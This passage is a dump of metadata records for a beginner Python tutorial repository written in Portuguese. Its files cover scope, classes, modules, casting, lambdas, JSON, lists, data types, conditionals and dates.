"text": "'''\nPython Scope\n\nUma variável está disponível apenas dentro da área em que foi criada. Isso é chamado de Escopo.\n\nEscopo Local\n\nUma variável criada dentro de uma função pertence ao escopo local dessa função e só pode ser usada dentro dessa função.\n'''\n# Exemplo\n# Uma variável criada dentro de uma função está disponível apenas dentro dessa função:\n\n\ndef minha_função():\n x = 100\n print(x)\n\n\nminha_função()\n\n'''\nFunction Inside Function\n\nConforme visto acima, a variável x não está disponível fora da função, mas está disponível para qualquer função dentro da função.\n'''\n# Exemplo\n# A variável local pode ser acessada de uma função dentro da função:\n\n\ndef minha_funcao_2():\n x = 200\n\n def minha_funcao_interna():\n print(x)\n minha_funcao_interna()\n\n\nminha_funcao_2()\n\n'''\nGlobal Scope\n\nUma variável criada no corpo principal do código Python é uma variável global e pertence ao escopo global.\n\nVariáveis globais estão disponíveis em qualquer escopo, global e local.\n'''\n# Exemplo\n# Uma variável criada fora de uma função é global e pode ser usada por qualquer pessoa:\n\nx = 300\n\n\ndef minha_funcao_3():\n print(x)\n\n\nminha_funcao_3()\n\nprint(x)\n\n'''\nNaming Variables\n\nSe nós operarmos com o mesmo nome de variável dentro e fora de uma função, p Python as trarará como duas variáveis separadas,\numa dispinível no escopo global (fora da função) e outra disponível no escopo local (dentro da função).\n'''\n# Exemplo\n# A função imprimirá o x local e,em seguida, o código imprimirá o x global:\n\nx = 200\n\n\ndef minha_funcao_4():\n x = 300\n print(x)\n\n\nminha_funcao_4()\nprint(x)\n\n'''\nGlobal Keyword\n\nSe precisármos criar uma variável global mas, estivérmos presos no escopo local, podemos usar a Global Keyword.\nA Global Keyword torna a variável global.\n'''\n# Exemplo:\n\ndef minha_funcao_5():\n global x\n x = 200\n print(x)\n\nminha_funcao_5()\n\nprint(x)\n\n# Além disso, usamos a Global Keyword se quisérmos fazer uma alteração em uma variável global dentro da função.\n# Exemplo:\n\nx = 400\n\ndef minha_funcao_6():\n global x\n x = 500 \n\nminha_funcao_6()\n\nprint(x)"
},
{
"alpha_fraction": 0.6479970216751099,
"alphanum_fraction": 0.6665430068969727,
"avg_line_length": 18.39568328857422,
"blob_id": "9d2aa5e620f25c0b5dac149423971c787df585d5",
"content_id": "3b118ddd565e7678c14dbac63d00ae895aed0978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2744,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 139,
"path": "/semana-3/classes_objects.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nClasses and Objects (Classes e Objetos)\n\nQuase tudo no Python é um objeto, com suas propriedades e métodos.\nUma classe é como um construtor de objetos ou um modelo para criar objetos.\n'''\n# Exemplo:\n\n\nclass MinhaClasseNome:\n nome = 'roger'\n\n\nprint(MinhaClasseNome)\n\n# Criação do objeto nome1 e impressão do valor nome:\n\nnome1 = MinhaClasseNome()\nprint(nome1.nome)\n\n'''\nThe __init__() Function \n\nPara entender o significado das classes, precisamos entender a função interna __init__().\n\nTodas as classes têm uma função chamada __init__(), que é sempre executada quando a classe está sendo iniciada.\n\nUsamos a função __init__() para atribuir valores às propriedades do objeto ou outras operações necessárias quando o objeto estiver sendo criado.\n'''\n# Exemplo:\n\n\nclass Pessoa:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n\np1 = Pessoa('Robert', 32)\n\nprint(p1.nome)\nprint(p1.idade)\n\n'''\nObject Methods (Métodos de objeto)\n\nObjetos também podem conter métodos. Métodos em objetos são funções que pertencem ao objeto.\n\n'''\n# Exemplo:\n\n\nclass Pessoa2:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc2(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np2 = Pessoa2('Roger', 32)\np2.minhaFunc2()\n\n'''\nThe self Parameter (O Parâmetro self)\n\nO parâmetro self é uma referencia a instância atual da classe e é usado para acessar variáveis que pertencem à classe.\n\nEle não precisa ser nomeado como self, podemos chamá-lo como quisermos, mas dever ser o primeiro parâmetro de qualquer função da classe.\n'''\n# Exemplo:\n\n\nclass Pessoa3:\n def __init__(meuparametro, nome, idade):\n meuparametro.nome = nome\n meuparametro.idade = idade\n\n def minhaFunc3(abc):\n print('Olá, meu nome é: ' + abc.nome)\n\n\np3 = Pessoa3('Roger', 32)\np3.minhaFunc3()\n\n# Modificando propriedades do objeto:\n\n\nclass Pessoa4:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc4(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np4 = Pessoa4('Rogerio', 32)\n\np4.idade = 40\n\nprint(p4.idade)\n\n# Deletando propriedades de um objeto com del:\n\n\nclass Pessoa5:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc5(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np5 = Pessoa5('Richard', 50)\n\ndel p5.idade\n\nprint(p5.idade)\n\n# Deletando objetos com del:\n\n\nclass Pessoa6:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc6(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np6 = Pessoa6('Richard', 50)\n\ndel p6\n\nprint(p6)\n"
},
{
"alpha_fraction": 0.7192118167877197,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 14.615385055541992,
"blob_id": "6ccd534b0ab36075f6bf7cc8f955f7440a58d003",
"content_id": "63b28c82363a7ad02e4559aa4d7571d4a7993a42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 13,
"path": "/semana-4/modules_2.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nUso do Módulo\n\nPodemos usar o módulo que acabamos de criar, usando a instrução import.\n'''\n# Exemplo:\n\nimport modules\n\nmodules.boas_vindas('Rogerio!')\n\nidade = modules.pessoa_1[\"idade\"]\nprint(idade)\n"
},
{
"alpha_fraction": 0.6493030190467834,
"alphanum_fraction": 0.6705796122550964,
"avg_line_length": 24.240739822387695,
"blob_id": "2f3cbceb323336e281daf89e0ed399718640f1b3",
"content_id": "73bfbd6365ee165b720eb58ffcb2373198f3fca0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1389,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 54,
"path": "/semana-1/casting.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Casting (Fusão)\n\nEspecifica um tipo de variável\n\nPode haver momentos em que você queira especificar um tipo para uma variável. Isso pode ser feito com Casting.\nPython é uma linguagem orientada a objetos e, como tal, usa classes para definir tipos de dados, incluindo seus \ntipos primitivos.\n\nCasting em Python é, portanto, feita usando funções de construtor:\n\nint() - constrói um número inteiro a partir de um literal int, um literal float (arredondando para baixo para o número\n int anterior) ou um literal string (desde que a string represente um número int).\n\nfloat() - constrói um número float a partir de um literal int, um float literal ou um string literal (desde que a string\n represente um número inteiro ou flutuante).\n\nstr() - constrói uma string a partir de um ampla variedade de tipos de dados, incluindo strings, literais inteiros e literais float.\n'''\n\n# Exemplos\n\n# Integers:\n\nx = int(1) # x será 1\ny = int(2.8) # y será 2\nz = int('3') # z será 3\n\nprint (x)\nprint (y)\nprint (type(z))\n\n\n# Floats:\n\nx = float(1) # x será 1.0\ny = float(2.8) # y será 2.8\nz = float('3') # z será 3.0\nw = float('4.2') # w será 4.2\n\nprint (x)\nprint (y)\nprint (z)\nprint (type(w))\n\n# Strings\n\nx = str('s1') # x será 's1'\ny = str(2) # y será '2'\nz = str(3.0) # z será '3.0'\n\nprint (x)\nprint (y)\nprint (type(z))\n"
},
{
"alpha_fraction": 0.7227723002433777,
"alphanum_fraction": 0.7349581122398376,
"avg_line_length": 23.314815521240234,
"blob_id": "9b2356ccdf0fb90f0bdf1b9866f574dad5178c36",
"content_id": "77ca0ff086de2ea5a8745c6c0f7aee951304e4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1362,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 54,
"path": "/semana-3/lambda.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nLambda Function (Função Lambda)\n\nUma função Lambda é uma pequena função anônima.\nUma função Lambda pode receber qualquer número de argumentos, mas pode ter apenas uma expressão.\n'''\n# Exemplo - Uma função lambda que adiciona 10 ao número passado como argumento e imprime o resultado:\n\n\ndef x(numero_x): return numero_x + 10\n\n\nprint(x(5))\n\n'''\nAs funções Lambdas podem receber qualquer número de argumentos.\n'''\n# Exemplo - Uma função lambda que multiplica o parâmetro passado A pelo parâmetro B e imprime o resultado:\n\n\ndef y(a, b): return a * b\n\n\nprint(y(10, 5))\n\n# Exemplo - Uma função lambda que soma os parâmetros A, B, e C e imprime o resultado:\n\n\ndef z(a, b, c): return a + b + c\n\n\nprint(z(2, 3, 5))\n\n'''\nPor que usar funções Lambda?\n\nO poder do Lambda é mostrado melhor quando a usamos como uma função anônima dentro de outra função.\nDigamos que temos uma definição de função que aceite um parâmetro e esse parâmetro será multiplicado por um número desconhecido.\n'''\n# Exemplo:\n\n\ndef minha_funcao_anonima(n):\n return lambda numero_x: numero_x * n\n\n# Usamos essa definição de função para criar uma função que sempre dobre o número que enviamos por parâmetro:\n\n\ndef minha_funcao_anonima_2(n):\n return lambda numero_x: numero_x * n\n\n\nmeu_dobrador = minha_funcao_anonima_2(2)\nprint(meu_dobrador(10))\n"
},
{
"alpha_fraction": 0.6954887509346008,
"alphanum_fraction": 0.7005012631416321,
"avg_line_length": 20,
"blob_id": "1185df35da3058370f016b77a5bf23247853a4fc",
"content_id": "bbe91d3b13a0131b8b601bcacc376ce175b18c54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 805,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 38,
"path": "/semana-4/convert_json_to_python.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import json\n\n'''\nPython JSON\n\nJSON é uma sintaxe para armazenamento e troca de dados.\n\nJSON é um texto escrito com notação de objeto JavaScript.\n\nPython tem um pacote integrado chamado json, que pode ser usado para trabalhar com dados JSON.\n'''\n# Exemplo\n# Importa o módulo json:\n\n# import json\n\n'''\nParse JSON - Converte de JSON para Python\n\nSe tivermos uma string JSON, podemos analisá-la usando o método json.loads(). \n'''\n# Exemplo\n# Converte de JSON para Python:\n\n# JSON:\n\nstring_json = '{\"nome\":\"John\", \"idade\":32, \"cidade\":\"Salvador-BA\"}'\n# x = '{ \"nome\":\"John\", \"idade\":30, \"cidade\":\"Salvador-BA\"}'\n\n# parse string_json:\n\nparse_json_para_python = json.loads(string_json)\n# y = json.loads(x)\n\n# o resultado e um dicionario Python:\n\nprint(parse_json_para_python[\"idade\"])\n# print(y[\"idade\"])\n"
},
{
"alpha_fraction": 0.7862903475761414,
"alphanum_fraction": 0.7862903475761414,
"avg_line_length": 19.66666603088379,
"blob_id": "0a6b45f11890eaee194e76897d247af5db93128d",
"content_id": "cd27470b272154a4ec2a1749fcaab59051fbbec7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 12,
"path": "/semana-4/modules_4.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nMódulos Integrados\n\nExistem vários módulos embutidos no Python, que podemos importar quando quisermos.\n'''\n# Exemplo\n# Importar e usar o módulo da plataforma:\n\nimport platform\n\nsistema_operacional = platform.system()\nprint(sistema_operacional)\n"
},
{
"alpha_fraction": 0.6403785347938538,
"alphanum_fraction": 0.6498422622680664,
"avg_line_length": 16.61111068725586,
"blob_id": "1e69df9b61c364a8b4a4f444a0e434e98a243ef8",
"content_id": "1dfa05ecd3cc83d022fe001008f0867c664485b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 18,
"path": "/semana-4/modules_6.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nImportar do Módulo\n\nPodemos escolher importar apenas partes de um Módulo, usando a keyword from.\n'''\n# Exemplo\n# O Módulo denominado 'modules' possui uma função e um dicionário:\n\n\ndef boas_vindas(nome):\n print('Olá, ' + nome)\n\n\npessoa_1 = {\n 'nome': 'Rogerio',\n 'idade': '32',\n 'cidade': 'Brasilia'\n}\n"
},
{
"alpha_fraction": 0.7075985074043274,
"alphanum_fraction": 0.7155101299285889,
"avg_line_length": 28.886699676513672,
"blob_id": "e7fefa8a79f78534c34178301ed4ba653c86ccee",
"content_id": "e46de1d9304e19dcf1daaaeb2c9ebf8dfbf530cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6171,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 203,
"path": "/semana-2/lists.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPYTHON LISTS\nPYTHON COLLECTIONS (Arrays)\n\nExistem quatro tipos de coleção de dados na linguagem de programação Python:\n\n- List (lista) é uma coleção que é ordenada e mutável. Permite membros duplicados.\n- Tuple (tupla) é uma coleção ordenada e imutável. Permite membros duplicados.\n- Set (conjunto) é uma coleção não ordenada e não indexada. Nenhum membro duplicado.\n- Dictionary (dicionário) é uma coleção desordenda, mutável e indexada. Nenhum membro duplicado.\n\nAo escolher um tipo de coleção, é útil entender as propriedades desse tipo. Escolher o tipo certo\npara um conjunto de dados específico pode significar retenção de significado e, também, aumento de eficiência ou segurança.\n'''\n\n# List\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist)\n\n# Itens de acesso - podemos acessar os itens da lista consultando o número do índice:\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist[1])\n\n# Indexação negativa (Negative Indexing)- significa que começa no final, -1 refere-se ao último item, -2 refere-se ao segundo último item etc...\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist[-1])\n\n# Intervalo de índices (Range of Indexes) - podemos especificar um intervalo de índices especificando por onde começar e por onde terminar o intervalo.\n# Ao especificar um intervalo, o valor retornado será uma nova lista com os itens especificados.\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[2:5])\n\n# Deixando de fora o valor inicial, o intervalo comecará no primeiro item:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[:4])\n\n# Deixando de fora o valor final, o intervalo continuará no final da lista:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[2:])\n\n# Intervalo de índices negativos (Range of Negative Indexes) - para especificar índices negativos do final da lista:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[-4:-1])\n\n# Intervalo de índices negativos (Range of Negative Indices)\n# Muda o segundo item:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist[1] = 'blackcurrant'\nprint(thislist)\n\n# Loop através de uma lista\n# Podemos percorrer os itens de uma lista usando loop for:\n\nthislist = ['apple', 'banana', 'cherry', 'melon']\nfor x in thislist:\n print(x)\n\n\n# Verifica se o item existe (Check if Item Exists)\n# Para determinar se um item específico está presente em uma lista, usamos a palavra-chave IN:\n\nthislist = ['apple', 'banana', 'cherry']\nif 'apple' in thislist:\n print(\"Yes, 'apple' is in the list\")\n\n# Comprimento da lista (List Length)\n# Para determinar quantos itens uma lista possui, usamosa a função len():\n\nthislist = ['apple', 'banana', 'cherry']\nprint(len(thislist))\n\n# Adicionar itens (Add Items)\n# Para adicionar um item ao final da lista, usamos o método APPEND():\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.append('orange')\nprint(thislist)\n\n# Para adicionar um item ao índice especificado, usamos o método INSERT():\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.insert(1, 'orange')\nprint(thislist)\n\n# Remover item (Remove Item)\n# Existem vários métodos para remover itens de uma lista:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.remove('banana')\nprint(thislist)\n\n# O método pop() remove um índice específico (ou o último item se o índice não for especificado):\n\nthislist = ['apple', 
'banana', 'cherry']\nthislist.pop()\nprint(thislist)\n\n# A palavra chave DEL remove um índice específico:\n\nthislist = ['apple', 'banana', 'cherry']\ndel thislist[0]\nprint(thislist)\n\n# A palavra chave DEL também pode deletar uma lista completa:\n\nthislist = ['apple', 'banana', 'cherry']\ndel thislist\n\n# O método clear() esvazia uma lista:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.clear()\nprint(thislist)\n\n'''\nCOPIAR UMA LISTA (Copy a List)\n\nNão podemos copiar uma lista simplesmente digitando list2 = list1, porque: list2 será apenas uma referência à list1 e as alterações feitas em list1 \ntambém serão automaticamente feitas em list2.\n\nExistem maneiras de se fazer uma cópia, e uma maneira é por meio do método de lista embutido copy().\n'''\n# Exemplo:\n\nthislist = ['apple', 'banana', 'cherry']\nmylist = thislist.copy()\nprint(mylist)\n\n# Outra maneira de se fazer uma cópia, é usando o método de lista embutido list():\n\nthislist = ['apple', 'banana', 'cherry']\nmylist = list(thislist)\nprint(mylist)\n\n'''\nUNINDO DUAS LISTAS (Join Two Lists)\n\nExistem várias maneiras de inserir ou concatenar duas ou mais listas.\nUma maneira fácil é fazendo uso do operador +.\n'''\n\n# Exemplo:\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nlist3 = list1 + list2\nprint(list3)\n\n# Outro maneira de unir listas é anexando(appending) todos os itens da list2 na list1, um por um:\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nfor x in list2:\n list1.append(x)\n\nprint(list1)\n\n# Ou ainda podemos usar o método extend(), cujo objetivo é adicionar elementos de uma lista para outra lista (o método extend() adiciona a list2 no final da list1):\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nlist1.extend(list2)\nprint(list1)\n\n'''\nCONSTRUTOR list() - The list() Constructor\n\nÉ possível usar o construtor list() para fazer uma nova lista.\n'''\n# Exemplo:\n\nthislist = list(('apple', 'banana', 'cherry'))\nprint(thislist)\n\n'''\nLISTA DE MÉTODOS (List Methods)\n\nPython possui um conjunto de métodos nativos que pode ser usado em listas:\n\n- append() -> Adiciona um elemento no final de uma lista.\n- clear() -> Remove todos os elementos da lista.\n- copy() -> Retorna uma cópia da lista.\n- count() -> Retorna o número de elementos com o específico valor.\n- extend() -> Adiciona elementos de uma lista para o final da lista.\n- index() -> Retorna o índice do primeiro elemento com o valor especificado.\n- insert() -> Adiciona um elemento em uma posição específica da lista.\n- pop() -> Remove o elemento da posição especificada.\n- remove() -> Remove o item com um valor específico.\n- reverse()-> Reverte a ordem da lista.\n- sort() -> Ordena a lista.\n\n'''\n"
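\n# Exemplo adicional (esboço ilustrativo, não consta do tutorial original):\n# uso dos métodos sort() e reverse() citados na lista acima:\n\nnumeros = [3, 1, 2]\nnumeros.sort()\nprint(numeros)  # [1, 2, 3]\nnumeros.reverse()\nprint(numeros)  # [3, 2, 1]\n"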
},
{
"alpha_fraction": 0.5614035129547119,
"alphanum_fraction": 0.5760233998298645,
"avg_line_length": 17.486486434936523,
"blob_id": "ce1504e0246cda93a785f37ba5ea93fdbe4a0d67",
"content_id": "3c1d1eb285bd4919b0f8974612745f55a67eafe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 37,
"path": "/semana-4/convert_python_objects_1.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import json\n\n'''\nQuando convertemos de Python para JSON, os objetos Python são convertidos\nao equivalente no JSON (JavaScript):\n\nPYTHON JSON\n\ndict -> Object\nlist -> Array\ntuple -> Array\nstr -> String\nint -> Number\nfloat -> Number\nTrue -> true\nFalse -> false\nNone -> null\n\n'''\n\n# Exemplo\n# Conversão de um objeto Python contendo todos os tipos de dados legais:\n\nx = {\n \"nome\": \"John\",\n \"idade\": 30,\n \"casado\": True,\n \"divorciado\": False,\n \"criancas\": (\"Ana\", \"Billy\"),\n \"pets\": None,\n \"carros\": [\n {\"modelo\": \"Volkswagen Gol\", \"ano\": 2020},\n {\"modelo\": \"Ford Focus\", \"ano\": 2019}\n ]\n}\n\nprint(json.dumps(x))\n"
},
{
"alpha_fraction": 0.6556603908538818,
"alphanum_fraction": 0.6745283007621765,
"avg_line_length": 15.960000038146973,
"blob_id": "f17de127450b8faa07538607716c66dc45ad1d60",
"content_id": "1fe37dd12e1c114c9ed069a3a8c5dae3f93ffa71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 424,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/semana-4/convert_python_objects.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPodemos converter objetos de tipos em Python em Strings JSON:\n\n- dict\n- list\n- tuple\n- string\n- int\n- float\n- True\n- False\n- None\n\n'''\nimport json\n\nprint(json.dumps({\"nome\": \"Joao\", \"idade\": 30}))\nprint(json.dumps([\"maca\", \"bananas\"]))\nprint(json.dumps((\"maca\", \"bananas\")))\nprint(json.dumps(\"ola\"))\nprint(json.dumps(42))\nprint(json.dumps(31.76))\nprint(json.dumps(True))\nprint(json.dumps(False))\nprint(json.dumps(None))\n"
},
{
"alpha_fraction": 0.44034773111343384,
"alphanum_fraction": 0.44784173369407654,
"avg_line_length": 42.355262756347656,
"blob_id": "e3e97443e550dc4959579b680b2b79dc951cf4db",
"content_id": "03b4f133cdc599a76896e37d098878796ad7b198",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3351,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 76,
"path": "/semana-1/data-type.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTipos de Dados (Data Types)\n\nEm programação, Data Types é um importante conceito.\nVariáveis podem armazenar dados de diferentes tipos, e diferentes tipos podem fazer diferentes coisas.\nPython possui os seguintes Data Types embarcaddos por default, nessas categorias:\n'''\n\n# Text Type: str\n# Numeric Types: int, float, complex\n# Sequence Types: list, tuple, range\n# Mapping Type: dict\n# Set Types: set, frozenset\n# Boolean Type: bool\n# Binary Types: bytes, bytearray, memoryview\n\n'''\nObtendo os Data Types\n\nPodemos obter o Data Type de qualquer objeto usando a função type(): \n'''\n\nx = 5\nprint(type(x)) # <class 'int'>\n\n'''\nDefinindo o Data Type\n\nEm Python, o data type é definido quando você atribue um valor para uma variável:\n'''\n\n# x = 'Hello World' Data Type (str):\n\nx = 'Hello World'\nprint(x) # display x \nprint(type(x)) # display the data type of x\n\n# x = 20 Data Type (int):\n# x = 20.5 Data Type (float)\n# x = 1j Data Type (complex)\n# x = ['apple', 'banana', 'cherry'] Data Type (list)\n# x = ('apple', 'banana', 'cherry') Data Type (tuple)\n# x = range(6) Data Type (range)\n# x = {'name' : 'John', 'age' : 32} Data Type (dict)\n# x = {'apple', 'banana', 'cherry'} Data Type (set)\n# x = frozenset({'apple', 'banana', 'cherry'}) Data Type (frozenset)\n# x = True Data Type (bool)\n# x = b'Hello' Data Type (bytes)\n# x = bytearray(5) Data Type (bytearray)\n# x = memoryview(bytes(5)) Data Type (memoryview)\n\n'''\nPodemos ainda, atribuir um específico data type.\n\nSe voçê quer especificar o data type, você pode usar o seguinte construtor de funções:\n'''\n\n# x = str('Hello World') Data Type (str)\n\nx = str('Hello World')\nprint(x) # display x\nprint(type(x)) # display the data type of x \n\n# x = int(20) Data Type (int)\n# x = float(20.5) Data Type (float)\n# x = complex(1j) Data Type (complex)\n# x = list(('apple', 'banana', 'cherry')) Data Type (list)\n# x = tuple(('apple', 'banana', 'cherry')) Data Type (tuple)\n# x = range(6) Data Type (range)\n# x = dict(name='John', age : 32) Data Type (dict)\n# x = set(('apple', 'banana', 'cherry')) Data Type (set)\n# x = frozenset(('apple', 'banana', 'cherry')) Data Type (frozenset)\n# x = boo(5) Data Type (bool)\n# x = bytes(5) Data Type (bytes)\n# x = bytearray(5) Data Type (bytearray)\n# x = memoryview(bytes(5)) Data Type (memoryview) "
},
{
"alpha_fraction": 0.6251649856567383,
"alphanum_fraction": 0.6533216238021851,
"avg_line_length": 17.631147384643555,
"blob_id": "01d2818581d3805e67d9470ddd0144087e4449fc",
"content_id": "d508f18d34a57f2d0bd383efa00caf131c341dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2343,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 122,
"path": "/semana-2/if_else.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nIf...Else \n\nO Python suporta as condições usuais lógicas da matemática:\n\n* É iguala: a == b\n* Diferente: a! = B\n* Menor que: a < b\n* Menor ou igual a: a <= b\n* Maior que: a > b\n* Maior que ou Igual a: a >= b \n\nEssas condições podem ser usadas de várias formas, mais comumente em 'instruções if' e loops.\n'''\n# Exemplo:\n\na = 14\nb = 30\nif b > a:\n print('b é maior que a.')\n\n'''\nElif\n\nA palavra-chave Elif é uma forma do Python dizer 'se a condição anterior não for verdadeira, tente esta condição'.\n'''\n# Exemplo:\n\na = 7\nb = 7\nif a > b:\n print('b é maior do que a.')\nelif a == b:\n print('a e b são iguais.')\n\n'''\nElse \n\nO Else captura qualquer coisa que não seja capturada pelas condições anteriores.\n'''\n# Exemplo:\n\na = 20\nb = 10\nif b > a:\n print('b é maior que a.')\nelif a == b:\n print('a e b são iguais.')\nelse:\n print('a é maior que b.')\n\n# Se tivermos apenas uma instrução para executar, podemos colocá-la na mesma linha que o If:\na = 200\nb = 100\n\n# if a > b: print('a é maior que b.')\n\n# Se tivermos apenas uma instrução para executar, uma para If e outra para Else, podemos também colocá-las na mesma linha:\n\na = 500\nb = 1000\nprint('A') if a > b else print('B')\n\n# Podemos ainda colocar várias instruções Else na mesma linha:\n\na = 1000\nb = 1000\nprint('A') if a > b else print('=') if a == b else print('B')\n\n'''\nAND\n\nA palavra-chave AND é um operador lógico usado para comparar instruções condicionais, quando AMBAS condições forem verdadeiras.\n'''\n# Exemplo:\n\na = 100\nb = 55\nc = 300\nif a > b and c > a:\n print('Ambas condições são verdadeiras.')\n\n'''\nOR\n\nA palvra-chave OR é um operador lógico usado para comparar instruções condicionais, qundo UMA das condições for verdadeiras.\n'''\n# Exemplo:\n\na = 100\nb = 55\nc = 300\nif a > b or c > a:\n print('Uma das condições é verdadeira.')\n\n'''\nIF ANINHADO\n\nPodemos ter instruções IF dentro de instruções IF, isso é chamado de intruções IF aninhadas.\n'''\n# Exemplo:\n\nx = 57\n\nif x > 10:\n print('Maior que 10,')\n if x > 20:\n print('e também maior que 20!')\n else:\n print('mas não maior que 60.')\n\n'''\nA declaração PASS\n\nSe por algum motivo tivermos uma instrução IF sem conteúdo, inserimos uma instrução PASS para evitar erros.\n'''\n# Exemplo:\n\na = 30\nb = 100\nif b > a:\n pass\n"
},
{
"alpha_fraction": 0.735733687877655,
"alphanum_fraction": 0.7445651888847351,
"avg_line_length": 23.131147384643555,
"blob_id": "e3154393b9f64c80864360b78494201ef2da081f",
"content_id": "56979d44ed4b9031cf4281e2bf98d0703d973129",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 61,
"path": "/semana-4/dates.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nDatas\n\nUma data em Python não é um tipo de dado próprio, mas podemos importar um módulo denominado 'datetime' para \ntrabalhar com datas como objetos de data.\n'''\n# Exemplo\n# Importa o módulo 'datetime' e exibe a data atual:\n\nimport datetime\n\nhora_atual = datetime.datetime.now()\nprint(hora_atual)\n\n'''\nDate Output\n\nA data de saída do código acima contém dia-mes-ano e a horário contém hora-minuto-segundo-microssegundo.\n\nO módulo datetime possui muitos métodos para retornar informações sobre o objeto date.\n'''\n\n# Exemplo\n# Retorna o ano e o nome do dia da semana\n\n\ndata_hora_atual = datetime.datetime.now()\n\nprint(data_hora_atual.year)\nprint(data_hora_atual.strftime(\"%A\"))\n\n'''\nCreating Date Objects\n\nPara criar uma data, usamos a classe datetime() (constructor) do módulo datetime.\n\nA classe datetime() requer três parâmetros para criação de uma data: ano, mês, dia.\n'''\n# Exemplo\n\ndata = datetime.datetime(2020, 9, 8)\nprint(data)\n\n'''\nA classe datetime() também usa parâmetros para hora e fuso horário(hora, minuto, segundo, microssegundo, tzone),\nmas eles são opcionais e possuem valor padrão de 0, (Nenhum para fuso horário).\n'''\n\n'''\nMétodo strftime()\n\nO objeto datetime possui um métdodo para formatar objetos de data em strings legíveis.\n\nO método é chamado strtime() e usa um parâmetro, formato, para especificar o foramato de string retornada.\n'''\n\n# Exemplo\n# Mostra o nome do mês:\n\nnome_mes = datetime.datetime(2020, 9, 1)\nprint(nome_mes.strftime(\"%B\"))\n"
},
{
"alpha_fraction": 0.75390625,
"alphanum_fraction": 0.75390625,
"avg_line_length": 22.272727966308594,
"blob_id": "99c047af83f54314710d436caa8745a5d2125fe6",
"content_id": "b6ac65c58b61b7387e2ee22804806115a38748b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
